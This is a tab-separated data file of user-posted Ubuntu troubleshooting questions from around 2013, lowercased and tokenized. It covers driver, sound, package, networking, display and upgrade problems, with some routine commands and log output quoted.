373549	ubuntu minimal in the new intel nuc haswell	i have one the of the new haswell nucs that just came out - d34010wyk . https : //downloadcenter.intel.com/detail_desc.aspx ? agr=y & dwnldid=23089 & lang=eng & osversion=os % 20independent & downloadtype=documentation ) , i tried to load ubuntu minimal 13.10 x64 from the mini.iso and it can not properly detect a network during install - my guess is a driver issue . tried 12.04 lts and it doesnt even see the nic at all . is there anything i could do to get one of the current versions to see the network properly ? i did try the latest trusty nightly desktop and it did install without issue . is there a minimal version of that ? thanks ernie
373553	how big a download is the ubuntu 13.10 upgrade ?	i want to download the new 'saucy salamander ' update but have a very limited connection . i assume it is n't too big as it is only an update from 13.04 to 13.10 but i do n't know if this is true .
373556	ubuntu studio audio issue with alsa - no sound	spec : os : ubuntu studio 13.10 64bit cpu : amd fx 4100 quad core memory : 6gb ddr3 video : radeon hd 4250 ( embedded on the mobo ) sound : delta 66 pci issue : i just installed ubuntu studio and found out that the streaming audio on a few common website such as youtube had no sound , and also my cd/dvds via a player . thus , in the terminal , i entered : sudo alsa force-reload it actually worked but the sound/audio output was mono and not stereo ( the sources are set to stereo stereo ) , and it seemed i was not able to locate any settings that can switch the output sound to stereo at all . i went through many forums and eventually `` autoremove '' pulseaudio since many said i would not be able to utilize both pulseaudio and alsa in this case . now , i have no audio whatsoever . does this version of ubuntu only offer mono sound/audio no matter what i do ? then , i may just need to ditch the whole thing and go back to windows , which i do n't want to since ubuntu studio offers many great apps , soundfonts etc.. i have also installed restricted extra , but even after rebooting , it did not resolve the issue . in the terminal mode , i pulled `` alsamixer '' and unmuted almost everything . but still no sound after a reboot . just an fyi , i have no saved data under this version of ubuntu studio yet , so please feel free to let me know whether i need to install studio 12.10 instead or mess with some installing/uninstalling apps/plug-ins , etc ... if it breaks at some point , all i need to do is to re-install it , which i do not mind at all . or , if you can provide me a step by step instruction to get this work , i do not mind clean install the studio 13.10 then wait for your instruction at all !
373557	will the mkfs reformat my usb/external hdd ?	i am having trouble with my external hdd because it appears to not have any filesystem type . will running the mkfs command completely reformat my hdd resulting in losing my data ?
373561	will proprietary software-based sound enhancements work with ubuntu ? ( beatsaudio , dolby )	this question is targeted at mainstream or gamer-grade software-based audio/sound enhancements , found in highly integrated computing and entertainment systems like laptops , tablets and smartphones . these are mostly marketed with fancy badges of known audio-releated brands on the product or packaging , while being mostly uncertain about the actual implementation or components used and poorly differentiated from the general audio capabilities of the system or device . this question is not about actual hardware like speakers . if your headphones are not properly detected , your speakers are assigned wrong , work partially or not at all then your soundcard or chip is not properly detected and you should take a look at troubleshooting audio issues . this question is also not about enthusiast or recording-grade hardware like recording interfaces , amplifiers and dacs in a variety of formfactors . and this question is also not about audio encoding and playback of different audio formats like dolby digital , dolby truehd and dts . most of these may be subject to patents and licensing , see restricted formats . if you are just searching for an equalizer , please take a look at this question : is there any sound enhancers/equalizer ? simply speaking : every feature where you would flip a switch or check a box in a fancy looking interface in windows that makes the sound change from neutral to fancy .
373564	how to autostart and resume any download in bittorrent as soon as system starts ?	i want transmission bittorrent to resume download as soon as system starts and any other download .
373566	screen splits into 4 after installing nvidia driver for 310m	just intsalled ubuntu 12.04 , but i want to get the most out of my graphics card so i installed the recommended drivers for nvidia 310m . when i boot up get to the login screen the display is split into 4 equal parts and each area is a mirror of the other . anyone have any ideas how to get a decent driver working for this . i have tried bumblebee and looked at nearly all the solutions on the forum . it seems that nvidia just sucks in general .
373567	openssh permissions	i 'm running an ssh server , and i need three users . the first will be an admin , have ssh access , and can view everything . the latter two ca n't user ssh , and are limited to their respective directories . can anyone help me with this ?
373569	command sudo dpkg -r packettracer not working	i have installed cisco packet tracer from cisco-pt-601.bin . but i can not open it . when i tried to remove/uninstall using sudo dpkg -r packettracer , it said there is no installed package matching packettracer . i 'm using ubuntu 12.04 lts . please suggest any solution this problem . i am lacking in my ccna course due to this problem .
373574	firmware copy when kernel updates	i have a mythbuntu 12.04 install using a hauppage 2250 tuner card , with each kernel update i have to manually copy the tuner card firmware to the new /lib/firmware/3.8.0-xx-generic folder . i have automatic updates turned off so i can see everything that is installed since this 'broke ' my pvr the first time it happened . is there a way to automate the firmware copy when the kernel updates ?
373578	running grub-mkconfig on liveusb	i have relatively complex problem so it will be good if you ask for more info rather than downvoting this question i have an 8gb pendrive with the following partitions : partition # 1 : 3gb ntfs ( my data ) partition # 2 : 1gb fat32 ( ubuntu 13.10 liveusb ) partition # 3 : 4gb ext2 ( casper-rw persistence ) after many unsuccessful attempts of booting it via syslinux , i installed & used grub2 successfully on it . the pendrive boots correctly with persistence ( just as i wanted ) . now i want to edit the boot/grub/grub.cfg file , which is inside the liveusb . editing it manually is tedious job so i thought of using grub-mkconfig . but it only generates grub.cfg for present installation and not for any other partition/drive . ( i prefer using grub-mkconfig as it will also add some theming and colours from the script /etc/grub.d/05_debian_theme complete with a higher-res boot menu and nice ubuntu background ) question 1 : how can i use grub-mkconfig to generate grub.cfg for booting the liveusb question 2 if using grub-mkconfg is not possible , then are there any gui applications to do so ?
373580	what is this updating problem ?	why did i get this message and how to fix it ? e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/extras.ubuntu.com_ubuntu_dists_precise_main_i18n_translation-en , e : the package lists or status file could not be parsed or opened . thank you !
373583	touchpad setting and issue in ubuntu 13.10	i 'm using ubuntu 13.10 and nautilus ( file ) v 3.8.2 on dell inspiron 7535 . i am getting wired behavior when dragging window . suppose if i click and told the left button on window title bar and drag the window by hovering over the touchpad then the windows sometimes start snaping and moves to some random position . thsi happens only when i remove the finger from the touchpad and for a moment ( when pointer reached at ends ) but at this moment i am still holding the left button . if i do n't remove the finger from the touchpad then it is ok . i hope my explanation is not that much clear..
373585	black screen ubuntu with 1234f : ?	ubuntu was up and running , my computer apparently got unplugged last night and died . i plugged it in and turned it on . my screen is all black with 1234f : . when i type a letter , number , or press enter it just make another line saying 1234f : i ca n't do anything with it .
373587	finger print reader for hp	i have a hp touch-smart m7 , is there any fingerprint reading software that would allow me to use my fingerprint reader ? i have tried fprint and fingerprint-gui , neither recognize my device and when i run lsusb it shows bus 002 device 002 : id 8087:8000 intel corp . bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 002 : id 8087:8008 intel corp . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 003 : id 0bda:571a realtek semiconductor corp . bus 003 device 002 : id 8087:07da intel corp . bus 003 device 005 : id 138a:0050 validity sensors , inc . bus 003 device 004 : id 0eef : a802 d-wav scientific co. , ltd bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub i believe the validity sensors , inc. is the correct driver . but why does it not show up in either fingerprint reader ?
373589	how to repair a broken package ?	my libboost package is broken . i do n't know how to fix it . i tried : sudo apt-get autoremove and it was the result : reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : libboost-chrono1.54-dev : depends : libboost1.54-dev ( = 1.54.0-2ubuntu3 ) but it is not installed libboost-date-time1.54-dev : depends : libboost1.54-dev ( = 1.54.0-2ubuntu3 ) but it is not installed libboost-exception1.54-dev : depends : libboost1.54-dev ( = 1.54.0-2ubuntu3 ) but it is not installed libboost-filesystem1.54-dev : depends : libboost1.54-dev ( = 1.54.0-2ubuntu3 ) but it is not installed libboost-graph-parallel1.54-dev : depends : libboost1.54-dev ( = 1.54.0-2ubuntu3 ) but it is not installed libboost-graph1.54-dev : depends : libboost1.54-dev ( = 1.54.0-2ubuntu3 ) but it is not installed libboost-iostreams1.54-dev : depends : libboost1.54-dev ( = 1.54.0-2ubuntu3 ) but it is not installed libboost-locale1.54-dev : depends : libboost1.54-dev ( = 1.54.0-2ubuntu3 ) but it is not installed libboost-log1.54-dev : depends : libboost1.54-dev ( = 1.54.0-2ubuntu3 ) but it is not installed libboost-math1.54-dev : depends : libboost1.54-dev ( = 1.54.0-2ubuntu3 ) but it is not installed libboost-mpi1.54-dev : depends : libboost1.54-dev ( = 1.54.0-2ubuntu3 ) but it is not installed libboost-program-options1.54-dev : depends : libboost1.54-dev ( = 1.54.0-2ubuntu3 ) but it is not installed libboost-python1.54-dev : depends : libboost1.54-dev ( = 1.54.0-2ubuntu3 ) but it is not installed libboost-random1.54-dev : depends : libboost1.54-dev ( = 1.54.0-2ubuntu3 ) but it is not installed libboost-regex1.54-dev : depends : libboost1.54-dev ( = 1.54.0-2ubuntu3 ) but it is not installed libboost-serialization1.54-dev : depends : libboost1.54-dev ( = 1.54.0-2ubuntu3 ) but it is not installed libboost-signals1.54-dev : depends : libboost1.54-dev ( = 1.54.0-2ubuntu3 ) but it is not installed libboost-system1.54-dev : depends : libboost1.54-dev ( = 1.54.0-2ubuntu3 ) but it is not installed libboost-test1.54-dev : depends : libboost1.54-dev ( = 1.54.0-2ubuntu3 ) but it is not installed libboost-thread1.54-dev : depends : libboost1.54-dev ( = 1.54.0-2ubuntu3 ) but it is not installed libboost-timer1.54-dev : depends : libboost1.54-dev ( = 1.54.0-2ubuntu3 ) but it is not installed libboost-wave1.54-dev : depends : libboost1.54-dev ( = 1.54.0-2ubuntu3 ) but it is not installed libboost1.54-all-dev : depends : libboost1.54-dev but it is not installed e : unmet dependencies . try using -f. then i tried : sudo apt-get install -f libboost1.54-dev and it was the result : building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : libboost-atomic1.53.0 libboost-context1.53.0 libboost-graph1.53.0 libboost-locale1.53.0 libboost-math1.53.0 libboost-python1.53.0 libboost-random1.53.0 libboost-signals1.53.0 libboost-test1.53.0 libboost-timer1.53.0 libboost-wave1.53.0 libboost1.53-tools-dev use 'apt-get autoremove ' to remove them . suggested packages : libboost1.54-doc libboost-coroutine.54-dev libboost-log.54-dev xsltproc doxygen default-jdk fop the following new packages will be installed : libboost1.54-dev 0 upgraded , 1 newly installed , 0 to remove and 14 not upgraded . 24 not fully installed or removed . need to get 0 b/10.3 mb of archives . after this operation , 101 mb of additional disk space will be used . ( reading database ... 320270 files and directories currently installed . ) unpacking libboost1.54-dev ( from ... /libboost1.54-dev_1.54.0-2ubuntu3_amd64.deb ) ... dpkg : error processing /var/cache/apt/archives/libboost1.54-dev_1.54.0-2ubuntu3_amd64.deb ( -- unpack ) : trying to overwrite '/usr/bin/quickbook ' , which is also in package libboost1.53-tools-dev 1.53.0-6+exp3ubuntu8 no apport report written because maxreports is reached already dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/libboost1.54-dev_1.54.0-2ubuntu3_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) and this is the result of sudo apt-get check : reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : libboost-chrono1.54-dev : depends : libboost1.54-dev ( = 1.54.0-2ubuntu3 ) but it is not installed libboost-date-time1.54-dev : depends : libboost1.54-dev ( = 1.54.0-2ubuntu3 ) but it is not installed libboost-exception1.54-dev : depends : libboost1.54-dev ( = 1.54.0-2ubuntu3 ) but it is not installed libboost-filesystem1.54-dev : depends : libboost1.54-dev ( = 1.54.0-2ubuntu3 ) but it is not installed libboost-graph-parallel1.54-dev : depends : libboost1.54-dev ( = 1.54.0-2ubuntu3 ) but it is not installed libboost-graph1.54-dev : depends : libboost1.54-dev ( = 1.54.0-2ubuntu3 ) but it is not installed libboost-iostreams1.54-dev : depends : libboost1.54-dev ( = 1.54.0-2ubuntu3 ) but it is not installed libboost-locale1.54-dev : depends : libboost1.54-dev ( = 1.54.0-2ubuntu3 ) but it is not installed libboost-log1.54-dev : depends : libboost1.54-dev ( = 1.54.0-2ubuntu3 ) but it is not installed libboost-math1.54-dev : depends : libboost1.54-dev ( = 1.54.0-2ubuntu3 ) but it is not installed libboost-mpi1.54-dev : depends : libboost1.54-dev ( = 1.54.0-2ubuntu3 ) but it is not installed libboost-program-options1.54-dev : depends : libboost1.54-dev ( = 1.54.0-2ubuntu3 ) but it is not installed libboost-python1.54-dev : depends : libboost1.54-dev ( = 1.54.0-2ubuntu3 ) but it is not installed libboost-random1.54-dev : depends : libboost1.54-dev ( = 1.54.0-2ubuntu3 ) but it is not installed libboost-regex1.54-dev : depends : libboost1.54-dev ( = 1.54.0-2ubuntu3 ) but it is not installed libboost-serialization1.54-dev : depends : libboost1.54-dev ( = 1.54.0-2ubuntu3 ) but it is not installed libboost-signals1.54-dev : depends : libboost1.54-dev ( = 1.54.0-2ubuntu3 ) but it is not installed libboost-system1.54-dev : depends : libboost1.54-dev ( = 1.54.0-2ubuntu3 ) but it is not installed libboost-test1.54-dev : depends : libboost1.54-dev ( = 1.54.0-2ubuntu3 ) but it is not installed libboost-thread1.54-dev : depends : libboost1.54-dev ( = 1.54.0-2ubuntu3 ) but it is not installed libboost-timer1.54-dev : depends : libboost1.54-dev ( = 1.54.0-2ubuntu3 ) but it is not installed libboost-wave1.54-dev : depends : libboost1.54-dev ( = 1.54.0-2ubuntu3 ) but it is not installed libboost1.54-all-dev : depends : libboost1.54-dev but it is not installed e : unmet dependencies . try using -f. and the result of apt-cache policy libboost1.54-all-dev libboost-wave1.54-dev libboost-python1.54-dev is : libboost1.54-all-dev : installed : 1.54.0-2ubuntu3 candidate : 1.54.0-2ubuntu3 version table : *** 1.54.0-2ubuntu3 0 500 http : //ir.archive.ubuntu.com/ubuntu/ saucy/universe amd64 packages 100 /var/lib/dpkg/status libboost-wave1.54-dev : installed : 1.54.0-2ubuntu3 candidate : 1.54.0-2ubuntu3 version table : *** 1.54.0-2ubuntu3 0 500 http : //ir.archive.ubuntu.com/ubuntu/ saucy/universe amd64 packages 100 /var/lib/dpkg/status libboost-python1.54-dev : installed : 1.54.0-2ubuntu3 candidate : 1.54.0-2ubuntu3 version table : *** 1.54.0-2ubuntu3 0 500 http : //ir.archive.ubuntu.com/ubuntu/ saucy/universe amd64 packages 100 /var/lib/dpkg/status what should i do to repair libboost package ?
373591	is virtual box as effective as dual booting windows ?	is virtual box as effective as dual booting windows ? if i am able run windows in linux and do everything i can in windows i might as well as get rid of win 8 .
373596	broken display after installing kubuntu on older mac pro	i downloaded the kubunutu 13.10 64-bit installer and made a bootable usb stick . i want to install kubuntu on a fresh partition on my mac pro 1,1 which is currently running xubuntu 13.10 ( as well as mac os x ) . i had to do the install by booting the installer on my newer macbook , since the mac pro will not boot ubuntu disks or usb sticks ( something about efi or some such ) . so i booted the installer on the macbook , and installed into the new partition on mac pro via firewire target disk mode . the install succeeded , and i am able to boot into kubuntu on mac pro . but the display is wonky , perhaps because it was installed from a different machine with a different monitor ( ? ) . the login screen looks fine , and some of the `` desktop '' ( forgive my terminology ; i 'm new to kde ) such as the `` desktop '' button in the upper right corner of the screen is ok . but the panel along the bottom of the screen is completely trashed , as are any menus and popups . i can hack around and launch konsole and dolphin and they display normally , but parts of the windows get blanked out randomly . i managed to launch bin/systemsettings and looked at the display and monitors setting . it shows the proper display resolution . how can i straighten this problem out ? edit : i just tried plan b , installing the kubuntu-full package into my working xubuntu partition . kubuntu has the same display problems . xubuntu continues to work fine .
373597	why does wifi hotspot does n't work correctly ?	i have created the wifi hotspot . in windows , it used to display wifi signal on my nokia c3 but after creating wifi hotspot from ubuntu , i am facing certain problem . nokia c3 does n't even gets wifi signal . but wifi signal appears in my samsung mobile gts3-850 and i can access wifi if i put wifi security option to `` none '' on the other hand , if i create password then nomatters , if i type right password or not , it does n't connect to that wifi . note : i use wimax to access internet .
373604	rsync 'd a folder , folder does n't show up , but free disk space decreased	i am currently trying to switch from mac to windows/ubuntu dual boot ( on 2 seperate internal hdds ) , but ran into some trouble restoring my documents . i am not sure all the information below is necessary , but if i knew how to solve it , i would n't ask it here . i backed up my mac before buying this laptop on an external hdd with carbon copy cloner . i wanted to put these files on my user folder on my windows hdd , but i could not do that from inside windows ( hfs+ format of mac ) , so i used rsync from inside ubuntu to copy the documents from the ext hdd to the windows partition . it seemed like it went okay , but from inside windows ( and later also ubuntu ) the folder did n't show up . my free hdd space , however , has reduced with about 200 gb ( the size of the backup ) when looking at the disk properties ( from inside windows and ubuntu ) . rsync command i used : rsync -av /media/patrick/toshiba\ 1.5t/users/patrickvandenberg/ /media/patrick/windows8_os/users/patrick/macbackup/ folder does not exist : patrick @ patrick-lenovo-ideapad-y410p : ~ $ cd /media/patrick/windows8_os/users/patrick/macbackup bash : cd : /media/patrick/windows8_os/users/patrick/macbackup : no such file or directory size of disk : patrick @ patrick-lenovo-ideapad-y410p : ~ $ du -hs /media/patrick/windows8_os/ 195g /media/patrick/windows8_os/ size of disk according to disk properties : http : //i.stack.imgur.com/otemx.png ( not enough rep to insert the image )
373607	repeating input stuck	so the problem is , for example , if i typing something and clicking some key repeatedly it stucks and doesnt type until i stop and wait for about a second . same hapens when scrolling with mouse wheel and even caps lock . how do i fix this problem ? is there some option that i 've missed or accidently enabled or it may be something hardware related ? i have a broken laptop keyboard , so i use external usb one .
373608	how to sync lightning with android using `` ubuntu one '' ?	i have just got a new android smart phone and i would like to sync my lightning calender on my desktop with the phone . as ubuntu one syncs with thunderbird is there anyway to use this with an android app ( not google ) ?
373609	how do i get to terminal after upgrading to 13.10	i upgraded from 13.04 to 13.10 and now when system starts it goes to a black screen . i believe that the problem is related to the drivers for the nvidia graphics cards . how can i get to a terminal so as to disable the updated driver ? ? thanks
374602	i just upgraded to 13.10 in my virtual machine through virtual box but can restart successfully	this is what i see after i restart . how can i fix this ? am i suppose to type in a command ? is restoring my host computer to a later point a possible option ?
374603	the search button on the top left of my ubuntu 13.10 does not find anything	it just has the search circle turns , but it can never bring up any items found despite what i type in . is there a way i can reset or reinstall this part of ubuntu ?
374605	double account management after installing gnome 3.10	i am in ubuntu 13.10 64bit . i decided to switch from unity to gnome 3.10 , installed gnome 3.10 and removed unity . everything is working out fine , except from the online accounts management . if i open the system settings it looks like this : i get double account manager and somehow redundant language support ( wich i am not really bothered of ) . can i somehow remove the package for the old account manager so that empathy and my other programs will use accounts stored in the new one instead of the old ?
374607	multiple problems after upgrade to 13.10	irrespective of the program , the mouse pointer flashes most of the time at an unstable rate , often disappears completely for 5-10 seconds . 80-90 % of the time disappears over web pages ( tried both chromium and firefox ) making browsing a nightmare . i actually have to move the mouse little by little each time , wait for the cursor to reappear so that i can see where it is now , then move the mouse a little again , and repeat until i get it over the link or button i want to click . wifi dies after 3-4 suspend/resume cycles . when that happens ubuntu will not restart/shutdown from the menus , i have to do a sudo shutdown -r now to restart the system . keyboard input in alternate language ( i had greek installed ) stopped working . i still can not make it work . at some points , alt+tab stops showing the list of app icons so i can choose where i will go next . if a press tab twice i will go to the 2nd next app , alt+tab will then get me back to the previous one , but i do all this in the dark . no visual indication . now these are very fundamental problems , ridiculous i would say for an os upgrade experience at year 2013 , making using the laptop a total burden . none of these problems existed with 13.04 . 13.04 was the first installation of ubuntu on my laptop . hardware-wise i have a lenovo r400 . anyone any pointers ? preferably not void* : - ) thanks !
374609	easy encryption program ubuntu for ubuntu 13.10	hey i am searching for a program that can add a password too a folder with just right mouse click i am really lazy i already know there are lots of encryptions program but which one integrate well with the ubuntu interface
374610	copying issue in ubuntu 12.04 lts	while copying files from the pen-drive , the copying speed gradually slows down . copying rate is too slow and stops at the last moment . the dialogue box shows remaining time is 0 seconds , but copying is not finished yet . this happen only when copying from the pen-drive , this does n't happen when copying from the pen drive .
374611	fastboot command read error , ubuntu touch galaxy nexus	i am attempting to install ubuntu touch on my galaxy nexus . i have just finished unlocking it and i plug it into the computer ( ubuntu 12.04 ) and on the device it says fastboot command read error -2147834647 i am pretty clueless about this stuff .
374613	why ca n't my computer connect to external ips of range 192.xxx.xxx.xxx ?	i am encountering a very weird problem with my computer ( ubuntu 13.04 ) . i noticed that certain websites were unaccessible from my computer while they are accessible from other computers on my network . after some investigation i noticed that all unaccessible servers belong to the following ip range : 192.0.0.0/8 . when doing a traceroute i get the following result : justin @ justinpc : ~ $ traceroute 192.30.252.130 traceroute to 192.30.252.130 ( 192.30.252.130 ) , 30 hops max , 60 byte packets 1 justinpc ( 192.168.2.44 ) 2998.625 ms ! h 2998.522 ms ! h 2998.488 ms ! h justin @ justinpc : ~ $ this seems to indicate that the packets are n't even leaving my computer . i already tried while having the firewall disabled and still the problem persists . when booting another operating system on the computer everything works fine . the problem only occurs with ubuntu . my first thought would be that ubuntu thinks that the ip address is a local ip address and therefore does n't try to connect outside of my local network . if anyone has any ideas on how to possibly solve this problem , then let me know . thanks in advance . edit : i found the solution but ca n't post it due to a lack of reputation : i just discovered the problem after having it for a week . when looking at my ip routes : justin @ justinpc : ~ $ ip route show default via 192.168.2.254 dev wlan0 proto static 169.254.0.0/16 dev wlan0 scope link metric 1000 192.0.0.0/8 dev wlan0 proto kernel scope link src 192.168.2.44 metric 9 it occurs that all ip addresses starting with 192. get routed to my local machine which has the static ip 192.168.2.44 . this a problem of course . the solution is : sudo ip route del 192.0.0.0/8 sudo sudo ip route add 192.168.0.0/16 dev wlan0 proto kernel scope link src 192.168.2.44 metric 9 this adds the correct routes to prevent the external ips from getting blocked .
374615	disk problem : formatted before iso burn	i had a new dvd-rw disk that i formatted before trying to burn the ubuntu iso to . it game me an error that there was no recordable disk in the drive . any ideas ? -- edit 20:06 09/11/2013 -- i could n't get the image file to work and i had an extra disk lying around , so i successfully burnt that . if you have a better answer , it would be greatly appreciated . [ thanks for your help ; - ) ]
374621	how to install ubuntu touch on sprint galaxy nexus ( toroplus )	i know this has been asked before but i was wandering if anyone knew if there ubuntu touch has been ported to the sprint gnex recently or will be soon or if there is another way to install it .
374624	my keyboard works fine but firefox wo n't let me type .	whenever i try to use firefox the cursor works but i ca n't type anything . i tried looking for anything on settings to help but i found nothing . i had to exit ubuntu and use windows to ask this question .
374628	sudo apt-get update not working in ubuntu 12.04	it displays this message : e : could not get lock /var/lib/apt/lists/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock directory /var/lib/apt/lists/ help would be appreciated as i am unable to install anything . tried updating using the update manager but did n't work .
374629	update 13.04 to 13.10	on update from 13.04 to 13.10 i have lost my desktop . the desktop is empty , i can not do anything . there is no terminal . system configuration is present , but display is configured by 2560*1600 although the monitor can handle 1980*1080 maximum . on 13.04 i have nvidia driver which work perfectly . ubuntu is bootmgr for openuse 13.1 and vista home . how to restore ? ? ? regards , hans
374632	lubuntu : `` the specified directory is not valid ''	a little while ago , i removed a few of the default folders from my home directory on my lubuntu machine . now , whenever i log in , i get a warning message that says `` the specified directory is not valid '' . the really weird thing is that even after i re-created those folders , the message persists . what is causing this , and how do i fix it ? info edit : my ~/.config/user-dirs.dirs showed something like this : # this file is written by xdg-user-dirs-update # if you want to change or add directories , just edit the line you're # interested in . all local changes will be retained on the next run # format is xdg_xxx_dir= '' $ home/yyy '' , where yyy is a shell-escaped # homedir-relative path , or xdg_xxx_dir= '' /yyy '' , where /yyy is an # absolute path . no other format is supported . # xdg_documents_dir= '' $ home/documents '' xdg_pictures_dir= '' $ home/pictures '' xdg_desktop_dir= '' $ home/ '' xdg_download_dir= '' $ home/ '' xdg_templates_dir= '' $ home/ '' xdg_publicshare_dir= '' $ home/ '' xdg_music_dir= '' $ home/ '' xdg_videos_dir= '' $ home/ '' i commented out the lines that ended with a trailing slash , ran xdg-user-dirs-update , and rebooted . the directories were recreated and message went away , but i would like to know how i can get rid of both the message and the directories at the same time .
374633	installing the python 2.7 plugins to play the online radio	whenever i want to stream the online radio tunein , it says : python ( 2.7 ) needs to install the plugins to play the file of type txt/html decoder and the result is that i am not able to play the radio . what is the procedure to install the required python 2.7 plugins to play the online radio ?
374634	server 12.04 just lost nameserver	about wednesday ( that would be november 6 , 2013 ) all of my 12.04 boxes lost connectivity with their nameservers . they still were able to access email and ping by x.x.x.x addresses , but were not able to ping google.com , for instance . i fixed this issue on the desktops by going to network settings > wired > options > ipv4 > dns servers and entered 8.8.8.8 , 8.8.4.4 and saved . but now i can not update my two headless servers using apt-get . here is what i tried for /etc/network/interfaces ( i tried both ways with dhcp and static for eth0 , neither works ) . the loopback network interface : auto lo iface lo inet loopback the primary network interface : auto eth0 iface eth0 inet dhcp # iface eth0 inet static address 192.168.0.6 netmask 255.255.255.0 gateway 192.168.0.1 dns-nameservers 8.8.8.8 8.8.4.4 68.87.72.130 and here is what route returns : ==== kernel ip routing table destination gateway genmask flags metric ref use iface default 192.168.0.1 0.0.0.0 ug 100 0 0 eth0 192.168.0.0 * 255.255.255.0 u 0 0 0 eth0 ==== less /etc/resolv.conf returns : ==== # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 192.168.0.1 nameserver 8.8.8.8 nameserver 8.8.4.4 ==== i have also run sudo dpkg-reconfigure resolvconf there is nothing in the /base nor in the /head files . this is a production environment . these machines were working well for the last year or more until this past week . perhaps -omcast changed something ( seems unlikely since i have connectivity otherwise ) , or an upgrade changed something . i am sure that i am probably just missing something obvious to someone who knows about networking and nameservers , which i do not . how can i get the nameserver ( or whatever i need ) working ?
374635	netbeans does n't start , java fatal error , unless sudo	fresh 13.10 64b openjdk 6 is there , i just installed netbeans 7.01 from the repo , but it does n't work , i open then a console elect @ elect-desktop : ~ $ netbeans # # a fatal error has been detected by the java runtime environment : # # sigsegv ( 0xb ) at pc=0x00007faebdf79325 , pid=5251 , tid=140388628424448 # # jre version : 6.0_27-b27 # java vm : openjdk 64-bit server vm ( 20.0-b12 mixed mode linux-amd64 compressed oops ) # derivative : icedtea6 1.12.6 # distribution : ubuntu saucy salamander ( development branch ) , package 6b27-1.12.6-1ubuntu2 # problematic frame : # c [ libgobject-2.0.so.0+0x14325 ] g_cclosure_marshal_boolean__boxed_boxedv+0x985 # # an error report file with more information is saved as : # /home/elect/hs_err_pid5251.log [ thread 140386948781824 also had an error ] # # if you would like to submit a bug report , please include # instructions how to reproduce the bug and visit : # https : //bugs.launchpad.net/ubuntu/+source/openjdk-6/ # /usr/share/netbeans/7.0.1/bin/../platform/lib/nbexec : line 548 : 5251 aborted ( core dumped ) `` /usr/lib/jvm/java-6-openjdk-amd64/bin/java '' -djdk.home= '' /usr/lib/jvm/java-6-openjdk-amd64 '' -djava.library.path=/usr/lib/jni -classpath `` /usr/share/netbeans/7.0.1/platform/lib/boot.jar : /usr/share/netbeans/7.0.1/platform/lib/org-openide-modules.jar : /usr/share/netbeans/7.0.1/platform/lib/org-openide-util.jar : /usr/share/netbeans/7.0.1/platform/lib/org-openide-util-lookup.jar : /usr/lib/jvm/java-6-openjdk-amd64/lib/dt.jar : /usr/lib/jvm/java-6-openjdk-amd64/lib/tools.jar '' -dnetbeans.system_http_proxy= '' direct '' -dnetbeans.system_http_non_proxy_hosts= '' '' -dnetbeans.dirs= '' /usr/share/netbeans/7.0.1/nb : /usr/share/netbeans/7.0.1/bin/../ergonomics : /usr/share/netbeans/7.0.1/ide : /usr/share/netbeans/7.0.1/java : /usr/share/netbeans/7.0.1/bin/../xml : /usr/share/netbeans/7.0.1/apisupport : /usr/share/netbeans/7.0.1/bin/../webcommon : /usr/share/netbeans/7.0.1/bin/../websvccommon : /usr/share/netbeans/7.0.1/bin/../enterprise : /usr/share/netbeans/7.0.1/bin/../mobility : /usr/share/netbeans/7.0.1/bin/../profiler : /usr/share/netbeans/7.0.1/bin/../ruby : /usr/share/netbeans/7.0.1/bin/../python : /usr/share/netbeans/7.0.1/bin/../php : /usr/share/netbeans/7.0.1/bin/../visualweb : /usr/share/netbeans/7.0.1/bin/../soa : /usr/share/netbeans/7.0.1/bin/../identity : /usr/share/netbeans/7.0.1/bin/../uml : /usr/share/netbeans/7.0.1/harness : /usr/share/netbeans/7.0.1/bin/../cnd : /usr/share/netbeans/7.0.1/bin/../dlight : /usr/share/netbeans/7.0.1/bin/../groovy : /usr/share/netbeans/7.0.1/bin/../extra : /usr/share/netbeans/7.0.1/bin/../javafx : /usr/share/netbeans/7.0.1/bin/../javacard : '' -dnetbeans.home= '' /usr/share/netbeans/7.0.1/platform '' '-dnetbeans.importclass=org.netbeans.upgrade.autoupgrade ' '-dnetbeans.accept_license_class=org.netbeans.license.acceptlicense ' '-xx : maxpermsize=384m ' '-xmx768m ' '-client ' '-xss2m ' '-xms32m ' '-xx : permsize=32m ' '-dapple.laf.usescreenmenubar=true ' '-dapple.awt.graphics.usequartz=true ' '-dsun.java2d.noddraw=true ' '-dsun.java2d.pmoffscreen=false ' -xx : +heapdumponoutofmemoryerror -xx : heapdumppath= '' /home/elect/.netbeans/7.0/var/log/heapdump.hprof '' org.netbeans.main -- userdir `` /home/elect/.netbeans/7.0 '' `` -- branding '' `` nb '' 0 < & 0 looking around , the second answer , here vigintas labakojis , points out something regarding permission , i just try sudo netbeans , it works.. then i look for the ~/.cache/netbeans/ i dont have , i have instead ~/.netbeans/ then i run his commands on those folder , it does n't work.. it must be something else , do you have any idea ? in any case , my log /home/elect/hs_err_pid5251.log is here
